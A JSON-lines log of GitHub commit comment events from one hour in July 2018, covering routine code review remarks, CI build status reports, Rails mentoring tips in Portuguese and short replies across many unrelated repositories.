{"id":"8023936160","type":"CommitCommentEvent","actor":{"login":"twalpole"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29846805,"position":6,"line":362,"path":"rb/lib/selenium/webdriver/remote/w3c/bridge.rb","commit_id":"da6efc1b1b4809e20930050fe3a369032d00e1b7","created_at":"2018-07-26T16:48:40Z","updated_at":"2018-07-26T16:48:40Z","author_association":"CONTRIBUTOR","body":"@p0deje Looking back at the Firefox driver code it wouldn't have worked, so I guess I was mistaken on that -- sorry"}},"created_at":"2018-07-26T16:48:40Z"}
{"id":"8023939693","type":"CommitCommentEvent","actor":{"login":"jiel-nv"},"repo":{"name":"flang-compiler/flang"},"payload":{"comment":{"id":29846815,"position":null,"line":null,"path":null,"commit_id":"7da0254f387a2e10abbf0b6689c62528c6c1bade","created_at":"2018-07-26T16:49:21Z","updated_at":"2018-07-26T16:49:21Z","author_association":"NONE","body":"I've reproduced this issue and will fix it."}},"created_at":"2018-07-26T16:49:21Z"}
{"id":"8023950136","type":"CommitCommentEvent","actor":{"login":"AndroidJavaAI"},"repo":{"name":"DurajSky/hello-world"},"payload":{"comment":{"id":29846829,"position":36,"line":36,"path":"auto. + save text to file","commit_id":"fc160e1b5d77179626dc63e7e0294ac0968ef6ca","created_at":"2018-07-26T16:51:25Z","updated_at":"2018-07-26T16:51:25Z","author_association":"NONE","body":"In test don't use sout "}},"created_at":"2018-07-26T16:51:25Z"}
{"id":"8023951420","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29846830,"position":null,"line":null,"path":null,"commit_id":"0402ef3f2fc26e8fafa33e706014df14cd476196","created_at":"2018-07-26T16:51:39Z","updated_at":"2018-07-26T16:51:39Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/100/display/redirect) (on internal Jenkins) failed in stage 'Test docs' 🔥 : hudson.AbortException: Xamarin.Mac tests on macOS 10.10 failed (introspection)\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/100//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/0402ef3f2fc26e8fafa33e706014df14cd476196/100/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/0402ef3f2fc26e8fafa33e706014df14cd476196/100/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/0402ef3f2fc26e8fafa33e706014df14cd476196/100/jenkins-results/generator-diff/index.html) (only version changes)\n🔥 [Xamarin.Mac tests on macOS 10.10 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/100/display/redirect) 🔥\n🔥 [Xamarin.Mac tests on macOS 10.7 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/100/display/redirect) 🔥\n🔥 [Xamarin.Mac tests on macOS 10.8 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/100/display/redirect) 🔥\n🔥 [Xamarin.Mac tests on macOS 10.9 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/100/display/redirect) 🔥\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/0402ef3f2fc26e8fafa33e706014df14cd476196/100/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-26T16:51:39Z"}
{"id":"8023951596","type":"CommitCommentEvent","actor":{"login":"g13110253180"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29846831,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-26T16:51:41Z","updated_at":"2018-07-26T16:51:41Z","author_association":"NONE","body":"dddd ss aasd"}},"created_at":"2018-07-26T16:51:41Z"}
{"id":"8023952493","type":"CommitCommentEvent","actor":{"login":"AndroidJavaAI"},"repo":{"name":"DurajSky/hello-world"},"payload":{"comment":{"id":29846832,"position":50,"line":50,"path":"auto. + save text to file","commit_id":"fc160e1b5d77179626dc63e7e0294ac0968ef6ca","created_at":"2018-07-26T16:51:52Z","updated_at":"2018-07-26T16:51:52Z","author_association":"NONE","body":"Only one Assert"}},"created_at":"2018-07-26T16:51:52Z"}
{"id":"8023956654","type":"CommitCommentEvent","actor":{"login":"Khazbs"},"repo":{"name":"w4st3d/foobar2000"},"payload":{"comment":{"id":29846837,"position":null,"line":null,"path":null,"commit_id":"ed5e4e6339303df9ab23cffd9dcbc090669e4631","created_at":"2018-07-26T16:52:41Z","updated_at":"2018-07-26T16:52:41Z","author_association":"NONE","body":"Is it possible to set the Pitch Shift manually e.g. in some config file? I want a -0.32 st, but only can set -0.34 st using the shitty slider"}},"created_at":"2018-07-26T16:52:41Z"}
{"id":"8023956810","type":"CommitCommentEvent","actor":{"login":"branan"},"repo":{"name":"puppetlabs/beaker"},"payload":{"comment":{"id":29846838,"position":16,"line":573,"path":"lib/beaker/dsl/helpers/host_helpers.rb","commit_id":"6fa2744a5dec68b694657aab86f4884e7e21bd6b","created_at":"2018-07-26T16:52:43Z","updated_at":"2018-07-26T16:52:43Z","author_association":"MEMBER","body":"We should probably get back onto released versions. I'm unsure why we switched to master."}},"created_at":"2018-07-26T16:52:43Z"}
{"id":"8023958111","type":"CommitCommentEvent","actor":{"login":"TheSandDoctor"},"repo":{"name":"TheSandDoctor/Legobot-2.0"},"payload":{"comment":{"id":29846841,"position":null,"line":null,"path":null,"commit_id":"6419b7755b36abbd6a2728e17f0c67577b28d010","created_at":"2018-07-26T16:52:59Z","updated_at":"2018-07-26T16:52:59Z","author_association":"OWNER","body":"Thanks!"}},"created_at":"2018-07-26T16:52:59Z"}
{"id":"8023959191","type":"CommitCommentEvent","actor":{"login":"brunohpaiva"},"repo":{"name":"HyperiumClient/hyperiumclient.github.io"},"payload":{"comment":{"id":29846845,"position":null,"line":null,"path":null,"commit_id":"935ecd7a3887802d1966ff5830dffcbc35a7ed1c","created_at":"2018-07-26T16:53:12Z","updated_at":"2018-07-26T16:53:12Z","author_association":"CONTRIBUTOR","body":"Now the site can be accessed without an internet connection"}},"created_at":"2018-07-26T16:53:12Z"}
{"id":"8023961707","type":"CommitCommentEvent","actor":{"login":"LuizFernandoCabral"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29846848,"position":null,"line":null,"path":null,"commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-26T16:53:40Z","updated_at":"2018-07-26T16:53:40Z","author_association":"NONE","body":"Primeira coisa Gisely, utilizamos git para evitar perder versões, mesmo que não completas (geralmente funcionais, mas parcialmente completas), vejo que no caso, provavelmente o código foi submetido após o termino completo do exercício. Isto não é muito recomendado pois, alguma alteração em um código que estava funcionando (porém, novamente, ainda não completo) você pode acabar perdendo algo valioso (contar sempre com o cmd+z pode ser ruim as vezes)"}},"created_at":"2018-07-26T16:53:40Z"}
{"id":"8023962254","type":"CommitCommentEvent","actor":{"login":"golyalpha"},"repo":{"name":"golyalpha/DefinitelyTyped"},"payload":{"comment":{"id":29846849,"position":null,"line":null,"path":null,"commit_id":"8e3560e2e88c407142db46cd34d819923e45b458","created_at":"2018-07-26T16:53:47Z","updated_at":"2018-07-26T16:53:47Z","author_association":"OWNER","body":"Correction: Removed Property, not Color."}},"created_at":"2018-07-26T16:53:47Z"}
{"id":"8023966085","type":"CommitCommentEvent","actor":{"login":"LuizFernandoCabral"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29846859,"position":null,"line":null,"path":null,"commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-26T16:54:36Z","updated_at":"2018-07-26T16:54:36Z","author_association":"NONE","body":"Uma dica que o barbolo me passou que passarei a você: quando eu crio uma aplicação Rails, a primeira coisa que eu faço é um commit com a mensagem _rails new nome-applicacao --configuracoes_. Desta forma, fica claro o que é alteração do Rails ou do desenvolvedor."}},"created_at":"2018-07-26T16:54:36Z"}
{"id":"8023969724","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29846873,"position":null,"line":null,"path":null,"commit_id":"28afed5a868c21ccd38282e902d5deb26a0dfc21","created_at":"2018-07-26T16:55:21Z","updated_at":"2018-07-26T16:55:21Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-551](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-551).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-551-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-26T16:55:21Z"}
{"id":"8023974409","type":"CommitCommentEvent","actor":{"login":"roelguldemond"},"repo":{"name":"roelguldemond/hello-world"},"payload":{"comment":{"id":29846880,"position":null,"line":null,"path":null,"commit_id":"b4956fec19a11d19c34602f03631a7b6e1cd3f64","created_at":"2018-07-26T16:56:16Z","updated_at":"2018-07-26T16:56:16Z","author_association":"OWNER","body":"een 2e regel toegevoegd"}},"created_at":"2018-07-26T16:56:16Z"}
{"id":"8023975307","type":"CommitCommentEvent","actor":{"login":"LuizFernandoCabral"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29846882,"position":null,"line":null,"path":null,"commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-26T16:56:27Z","updated_at":"2018-07-26T16:56:27Z","author_association":"NONE","body":"O comando rails new --help mostra todas as opções para criação de uma aplicação Rails. Exemplo de opções que eu usaria neste projeto:\r\n\r\n--skip-action-mailer\r\n\r\n--skip-action-cable\r\n\r\n--skip-spring\r\n\r\n--skip-listen\r\n\r\n--skip-turbolinks\r\n\r\n--skip-test"}},"created_at":"2018-07-26T16:56:27Z"}
{"id":"8023976922","type":"CommitCommentEvent","actor":{"login":"TSC21"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":29846887,"position":5,"line":853,"path":"src/modules/mavlink/mavlink_receiver.cpp","commit_id":"9f99370a126efb8d69e351f2ff2f3da8e5718fc5","created_at":"2018-07-26T16:56:46Z","updated_at":"2018-07-26T16:56:46Z","author_association":"MEMBER","body":"Done in 9d691dc"}},"created_at":"2018-07-26T16:56:46Z"}
{"id":"8023980407","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29846893,"position":null,"line":null,"path":null,"commit_id":"87c44854b0c1b684962c3533a5d0ef95c0efba07","created_at":"2018-07-26T16:57:28Z","updated_at":"2018-07-26T16:57:28Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-961](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-961).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-961-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-26T16:57:28Z"}
{"id":"8023982397","type":"CommitCommentEvent","actor":{"login":"roelguldemond"},"repo":{"name":"roelguldemond/hello-world"},"payload":{"comment":{"id":29846898,"position":null,"line":null,"path":null,"commit_id":"851cf6638c9f3a2d1ea6e32af3f9e2fd3ba6b1df","created_at":"2018-07-26T16:57:51Z","updated_at":"2018-07-26T16:57:51Z","author_association":"OWNER","body":"Leesbaarder gemaakt door toevoegen hoofdleters en leestekens.  "}},"created_at":"2018-07-26T16:57:51Z"}
{"id":"8023988231","type":"CommitCommentEvent","actor":{"login":"mykola-mokhnach"},"repo":{"name":"appium/appium-base-driver"},"payload":{"comment":{"id":29846924,"position":5,"line":6,"path":"index.js","commit_id":"839cea5f139c9f3f0a5c8d87ad2a963680b538d3","created_at":"2018-07-26T16:59:00Z","updated_at":"2018-07-26T16:59:00Z","author_association":"CONTRIBUTOR","body":"wrongly positioned bracket?"}},"created_at":"2018-07-26T16:59:00Z"}
{"id":"8023989199","type":"CommitCommentEvent","actor":{"login":"pavel-lukashevich"},"repo":{"name":"pavel-lukashevich/delete-test"},"payload":{"comment":{"id":29846926,"position":null,"line":null,"path":null,"commit_id":"08e65b02516960e94e5345c83071bc9244702a3b","created_at":"2018-07-26T16:59:12Z","updated_at":"2018-07-26T16:59:12Z","author_association":"OWNER","body":"ага"}},"created_at":"2018-07-26T16:59:12Z"}
{"id":"8023989387","type":"CommitCommentEvent","actor":{"login":"LuizFernandoCabral"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29846927,"position":null,"line":null,"path":null,"commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-26T16:59:14Z","updated_at":"2018-07-26T16:59:14Z","author_association":"NONE","body":"Muitos arquivos desnecessários não estariam presentes dessa forma"}},"created_at":"2018-07-26T16:59:14Z"}
{"id":"8023990481","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29846931,"position":null,"line":null,"path":null,"commit_id":"e27d9e4dcb94317ff1ba7d607b4f0dd2e8341e73","created_at":"2018-07-26T16:59:27Z","updated_at":"2018-07-26T16:59:27Z","author_association":"COLLABORATOR","body":"Looks like there's still work to do here in Korean, with Transfer details\r\n![screen shot 2018-07-26 at 10 58 18 am](https://user-images.githubusercontent.com/163977/43276732-f23a216a-90c2-11e8-8307-e2068c717466.png)\r\n"}},"created_at":"2018-07-26T16:59:27Z"}
{"id":"8023996496","type":"CommitCommentEvent","actor":{"login":"JustinReynolds-MM"},"repo":{"name":"JustinReynolds-MM/docs"},"payload":{"comment":{"id":29846951,"position":26,"line":42,"path":"source/deployment/scaling.rst","commit_id":"3c5f20a9656e44ac01bf6463b5fd153480adbd76","created_at":"2018-07-26T17:00:36Z","updated_at":"2018-07-26T17:00:36Z","author_association":"OWNER","body":".. image:: ../images/scaling-1.png"}},"created_at":"2018-07-26T17:00:36Z"}
{"id":"8023998541","type":"CommitCommentEvent","actor":{"login":"roelguldemond"},"repo":{"name":"roelguldemond/hello-world"},"payload":{"comment":{"id":29846955,"position":null,"line":null,"path":null,"commit_id":"a3214e63f70d3d0bf76a35b8ff9edbcadead5476","created_at":"2018-07-26T17:00:59Z","updated_at":"2018-07-26T17:00:59Z","author_association":"OWNER","body":"en weer een poging, want de finesses begrijp ik nog niet echt"}},"created_at":"2018-07-26T17:00:59Z"}
{"id":"8024002067","type":"CommitCommentEvent","actor":{"login":"roelguldemond"},"repo":{"name":"roelguldemond/hello-world"},"payload":{"comment":{"id":29846963,"position":null,"line":null,"path":null,"commit_id":"a3214e63f70d3d0bf76a35b8ff9edbcadead5476","created_at":"2018-07-26T17:01:41Z","updated_at":"2018-07-26T17:01:41Z","author_association":"OWNER","body":"zzzzzz"}},"created_at":"2018-07-26T17:01:41Z"}
{"id":"8024005381","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29846971,"position":147,"line":142,"path":"src/main/java/net/pms/dlna/SevenZipEntry.java","commit_id":"4103fac3ba25826c718fec284c3061cb070560f6","created_at":"2018-07-26T17:02:22Z","updated_at":"2018-07-26T17:02:22Z","author_association":"CONTRIBUTOR","body":"Hehe, I was hurting everywhere here. The code isn't very good..."}},"created_at":"2018-07-26T17:02:22Z"}
{"id":"8024008245","type":"CommitCommentEvent","actor":{"login":"SubDragonzj"},"repo":{"name":"oreo-armani/android_device_xiaomi_armani"},"payload":{"comment":{"id":29846978,"position":null,"line":null,"path":null,"commit_id":"82d9a1134b6aa30050c4e67086b058daa24cc74a","created_at":"2018-07-26T17:02:55Z","updated_at":"2018-07-26T17:02:55Z","author_association":"NONE","body":"Hi,bro, I can't send messages on telegram for you. U need share contact?\r\nAnd, armani camera video recording work or not?"}},"created_at":"2018-07-26T17:02:55Z"}
{"id":"8024008294","type":"CommitCommentEvent","actor":{"login":"RyanHCoder"},"repo":{"name":"owenmorrill/subtonode"},"payload":{"comment":{"id":29846979,"position":null,"line":null,"path":null,"commit_id":"00b0f06a96e36916836f0efae220db676d44abf6","created_at":"2018-07-26T17:02:56Z","updated_at":"2018-07-26T17:02:56Z","author_association":"NONE","body":"Getting the same error as you and I'm not sure how to fix it. \r\n\r\n`Error: Call to a member function getOriginalData() on null`\r\n\r\nMay you please let me know how you fixed it! \r\nThanks."}},"created_at":"2018-07-26T17:02:56Z"}
{"id":"8024012156","type":"CommitCommentEvent","actor":{"login":"speedofdark"},"repo":{"name":"puppetlabs/beaker"},"payload":{"comment":{"id":29846986,"position":16,"line":573,"path":"lib/beaker/dsl/helpers/host_helpers.rb","commit_id":"6fa2744a5dec68b694657aab86f4884e7e21bd6b","created_at":"2018-07-26T17:03:46Z","updated_at":"2018-07-26T17:03:46Z","author_association":"NONE","body":"That is somewhat peculiar.\n\nOn Thu, Jul 26, 2018 at 9:52 AM, Branan Riley <notifications@github.com>\nwrote:\n\n> We should probably get back onto released versions. I'm unsure why we\n> switched to master.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/puppetlabs/beaker/commit/6fa2744a5dec68b694657aab86f4884e7e21bd6b#commitcomment-29846838>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AgHR14PJQP5pzTntYBBbhLgEYInsifC6ks5uKfPfgaJpZM4ViGRb>\n> .\n>\n"}},"created_at":"2018-07-26T17:03:46Z"}
{"id":"8024014797","type":"CommitCommentEvent","actor":{"login":"pimpmaneaton"},"repo":{"name":"pimpmaneaton/android_frameworks_base"},"payload":{"comment":{"id":29846991,"position":null,"line":null,"path":null,"commit_id":"7facfb00005f6d815e70bfc037d06c35f9acabd2","created_at":"2018-07-26T17:04:16Z","updated_at":"2018-07-26T17:04:16Z","author_association":"OWNER","body":"@ezio84 is there a way to have both of these features built in. I have tried to modify this and it does build but SystemUI will not even start. Sorry to bug you but you are a wizard with this feature among others."}},"created_at":"2018-07-26T17:04:16Z"}
{"id":"8024015635","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29846993,"position":107,"line":119,"path":"src/main/java/net/pms/dlna/SevenZipEntry.java","commit_id":"4103fac3ba25826c718fec284c3061cb070560f6","created_at":"2018-07-26T17:04:27Z","updated_at":"2018-07-26T17:04:27Z","author_association":"CONTRIBUTOR","body":"Argh, I forgot to fix this terrible logging. Ideally I should before we merge."}},"created_at":"2018-07-26T17:04:27Z"}
{"id":"8024015955","type":"CommitCommentEvent","actor":{"login":"wegry"},"repo":{"name":"atelierdisko/dsk"},"payload":{"comment":{"id":29846994,"position":17,"line":38,"path":"search.go","commit_id":"5e4500a09a4a794a8427f243c0c3d5ff9aedd7cd","created_at":"2018-07-26T17:04:31Z","updated_at":"2018-07-26T17:04:31Z","author_association":"NONE","body":"Most technical terms in English are Latin and French I’m afraid."}},"created_at":"2018-07-26T17:04:31Z"}
{"id":"8024016310","type":"CommitCommentEvent","actor":{"login":"giselyalves13"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29846995,"position":null,"line":null,"path":null,"commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-26T17:04:36Z","updated_at":"2018-07-26T17:04:36Z","author_association":"OWNER","body":"Valeu!"}},"created_at":"2018-07-26T17:04:36Z"}
{"id":"8024019698","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29847004,"position":189,"line":209,"path":"src/main/java/net/pms/dlna/SevenZipEntry.java","commit_id":"4103fac3ba25826c718fec284c3061cb070560f6","created_at":"2018-07-26T17:05:19Z","updated_at":"2018-07-26T17:05:19Z","author_association":"CONTRIBUTOR","body":"*are*"}},"created_at":"2018-07-26T17:05:19Z"}
{"id":"8024024305","type":"CommitCommentEvent","actor":{"login":"jjongyeonglee"},"repo":{"name":"gangnamjava/java-example"},"payload":{"comment":{"id":29847014,"position":86,"line":86,"path":"pangjaehun","commit_id":"485f357042f361fed1a5f212dfe5292f1a033fac","created_at":"2018-07-26T17:06:16Z","updated_at":"2018-07-26T17:06:16Z","author_association":"CONTRIBUTOR","body":"() 소괄호 어디갔나요? "}},"created_at":"2018-07-26T17:06:16Z"}
{"id":"8024025393","type":"CommitCommentEvent","actor":{"login":"Jekaa"},"repo":{"name":"Jekaa/Stockfish"},"payload":{"comment":{"id":29847016,"position":null,"line":null,"path":null,"commit_id":"f76c6f42a3c0b9be345859545bd37bf5df9be20d","created_at":"2018-07-26T17:06:29Z","updated_at":"2018-07-26T17:06:29Z","author_association":"OWNER","body":"Results for 10 tests for each version:\r\n\r\n            Base      Test      Diff      \r\n    Mean    2007866   2018706   -10840    \r\n    StDev   21165     24022     4135      \r\n\r\np-value: 0,996\r\nspeedup: 0,005"}},"created_at":"2018-07-26T17:06:29Z"}
{"id":"8024025804","type":"CommitCommentEvent","actor":{"login":"EliaGorokhovsky"},"repo":{"name":"EliaGorokhovsky/Time-Error-Correction-D"},"payload":{"comment":{"id":29847018,"position":null,"line":null,"path":null,"commit_id":"0757cdd4662eeeff13b85a23f6576a93bb636f51","created_at":"2018-07-26T17:06:34Z","updated_at":"2018-07-26T17:06:34Z","author_association":"OWNER","body":"I made a typo in the commit message; oops!"}},"created_at":"2018-07-26T17:06:34Z"}
{"id":"8024027773","type":"CommitCommentEvent","actor":{"login":"YuriiRadio"},"repo":{"name":"sergejey/majordomo"},"payload":{"comment":{"id":29847024,"position":null,"line":null,"path":null,"commit_id":"6383d89f8d2e58dd3e9a3976e1963755a1039de3","created_at":"2018-07-26T17:06:58Z","updated_at":"2018-07-26T17:06:58Z","author_association":"CONTRIBUTOR","body":"} else if (SETTINGS_SITE_LANGUAGE == 'ua') {\r\n    $lang = 'uk_UA';"}},"created_at":"2018-07-26T17:06:58Z"}
{"id":"8024029220","type":"CommitCommentEvent","actor":{"login":"dashersw"},"repo":{"name":"merveer/flight-checkin"},"payload":{"comment":{"id":29847026,"position":27,"line":21,"path":"checkin/src/components/checkin.vue","commit_id":"8400eee33a0ee6abc24f70c1216340a773d78932","created_at":"2018-07-26T17:07:15Z","updated_at":"2018-07-26T17:07:15Z","author_association":"NONE","body":"it should be seat in seats, not seat in 20. you shouldn't need to do `v-if=\"clickedButton == Seats[seats-1]+seat\"` but you can do `v-if=\"clickedButton == seat\"`"}},"created_at":"2018-07-26T17:07:15Z"}
{"id":"8024029793","type":"CommitCommentEvent","actor":{"login":"renahnschultz"},"repo":{"name":"renahnschultz/odonto-system-manager"},"payload":{"comment":{"id":29847028,"position":null,"line":null,"path":null,"commit_id":"6644f6dd8f62c5e6dea32ba615b9235646e58a3c","created_at":"2018-07-26T17:07:22Z","updated_at":"2018-07-26T17:07:22Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Cadastro de serviços.](https://trello.com/c/uPpyVSkN/1-cadastro-de-servi%C3%A7os)"}},"created_at":"2018-07-26T17:07:22Z"}
{"id":"8024030345","type":"CommitCommentEvent","actor":{"login":"dashersw"},"repo":{"name":"merveer/flight-checkin"},"payload":{"comment":{"id":29847030,"position":85,"line":72,"path":"checkin/src/components/checkin.vue","commit_id":"8400eee33a0ee6abc24f70c1216340a773d78932","created_at":"2018-07-26T17:07:28Z","updated_at":"2018-07-26T17:07:28Z","author_association":"NONE","body":"why is this capital S?"}},"created_at":"2018-07-26T17:07:28Z"}
{"id":"8024031321","type":"CommitCommentEvent","actor":{"login":"dashersw"},"repo":{"name":"merveer/flight-checkin"},"payload":{"comment":{"id":29847033,"position":96,"line":83,"path":"checkin/src/components/checkin.vue","commit_id":"8400eee33a0ee6abc24f70c1216340a773d78932","created_at":"2018-07-26T17:07:41Z","updated_at":"2018-07-26T17:07:41Z","author_association":"NONE","body":"why do you need two different variables?"}},"created_at":"2018-07-26T17:07:41Z"}
{"id":"8024031746","type":"CommitCommentEvent","actor":{"login":"speedofdark"},"repo":{"name":"puppetlabs/beaker"},"payload":{"comment":{"id":29847034,"position":16,"line":573,"path":"lib/beaker/dsl/helpers/host_helpers.rb","commit_id":"6fa2744a5dec68b694657aab86f4884e7e21bd6b","created_at":"2018-07-26T17:07:46Z","updated_at":"2018-07-26T17:07:46Z","author_association":"NONE","body":"These are all 2-4 months ago?\n\nOn Thu, Jul 26, 2018 at 10:03 AM, Jonathan Morris <jonathan@puppet.com>\nwrote:\n\n> That is somewhat peculiar.\n>\n> On Thu, Jul 26, 2018 at 9:52 AM, Branan Riley <notifications@github.com>\n> wrote:\n>\n>> We should probably get back onto released versions. I'm unsure why we\n>> switched to master.\n>>\n>> —\n>> You are receiving this because you were mentioned.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/puppetlabs/beaker/commit/6fa2744a5dec68b694657aab86f4884e7e21bd6b#commitcomment-29846838>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AgHR14PJQP5pzTntYBBbhLgEYInsifC6ks5uKfPfgaJpZM4ViGRb>\n>> .\n>>\n>\n>\n"}},"created_at":"2018-07-26T17:07:46Z"}
{"id":"8024033249","type":"CommitCommentEvent","actor":{"login":"dashersw"},"repo":{"name":"merveer/flight-checkin"},"payload":{"comment":{"id":29847037,"position":176,"line":125,"path":"checkin/src/components/checkin.vue","commit_id":"8400eee33a0ee6abc24f70c1216340a773d78932","created_at":"2018-07-26T17:08:06Z","updated_at":"2018-07-26T17:08:06Z","author_association":"NONE","body":"it's not the role of this component to calculate random variables. move this to the store."}},"created_at":"2018-07-26T17:08:06Z"}
{"id":"8024033743","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29847038,"position":null,"line":null,"path":null,"commit_id":"8504a17262c2a8230415e24997bf23ff7760ae50","created_at":"2018-07-26T17:08:12Z","updated_at":"2018-07-26T17:08:12Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-552](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-552).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-552-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-26T17:08:12Z"}
{"id":"8024033933","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29847040,"position":14,"line":24,"path":"contracts/Splitter.sol","commit_id":"c8ffbf73d32d0702543e9c6aa84c835c2778518c","created_at":"2018-07-26T17:08:14Z","updated_at":"2018-07-26T17:08:14Z","author_association":"OWNER","body":"thanks"}},"created_at":"2018-07-26T17:08:14Z"}
{"id":"8024034516","type":"CommitCommentEvent","actor":{"login":"dashersw"},"repo":{"name":"merveer/flight-checkin"},"payload":{"comment":{"id":29847043,"position":200,"line":137,"path":"checkin/src/components/checkin.vue","commit_id":"8400eee33a0ee6abc24f70c1216340a773d78932","created_at":"2018-07-26T17:08:22Z","updated_at":"2018-07-26T17:08:22Z","author_association":"NONE","body":"you can't modify the store in the component, i think i told this before. move these to the store."}},"created_at":"2018-07-26T17:08:22Z"}
{"id":"8024035397","type":"CommitCommentEvent","actor":{"login":"royal50911"},"repo":{"name":"coreos/etcd"},"payload":{"comment":{"id":29847045,"position":null,"line":null,"path":null,"commit_id":"143fc4ce7939bdaa77a7affce45778d9ad5f8ce9","created_at":"2018-07-26T17:08:32Z","updated_at":"2018-07-26T17:08:32Z","author_association":"NONE","body":"go doesnt like tab, so it failed at checking fmt . please, update this bug.\r\n\r\ngofmt checking failed:\r\nmvcc/backend/backend.go\r\ndiff -u mvcc/backend/backend.go.orig mvcc/backend/backend.go\r\n--- mvcc/backend/backend.go.orig    2018-07-26 09:36:28.678542205 -0700\r\n+++ mvcc/backend/backend.go    2018-07-26 09:36:28.682542306 -0700\r\n@@ -292,7 +292,7 @@\r\n\r\nfunc (b *backend) defrag() error {\r\n     now := time.Now()\r\n-    \r\n+\r\n     // TODO: make this non-blocking?\r\n     // lock batchTx to ensure nobody is using previous tx, and then\r\n     // close previous ongoing tx."}},"created_at":"2018-07-26T17:08:32Z"}
{"id":"8024038484","type":"CommitCommentEvent","actor":{"login":"LuizFernandoCabral"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29847048,"position":8,"line":8,"path":"app/helpers/sessions_helper.rb","commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-26T17:09:10Z","updated_at":"2018-07-26T17:09:10Z","author_association":"NONE","body":"Sei que fui que pedi para colocar na hora que estavamos debugando, mas lembrar de remover comentarios"}},"created_at":"2018-07-26T17:09:10Z"}
{"id":"8024039285","type":"CommitCommentEvent","actor":{"login":"dashersw"},"repo":{"name":"merveer/flight-checkin"},"payload":{"comment":{"id":29847049,"position":43,"line":43,"path":"checkin/src/store/index.js","commit_id":"8400eee33a0ee6abc24f70c1216340a773d78932","created_at":"2018-07-26T17:09:19Z","updated_at":"2018-07-26T17:09:19Z","author_association":"NONE","body":"don't mutate the state in actions, move the mutations to mutations."}},"created_at":"2018-07-26T17:09:19Z"}
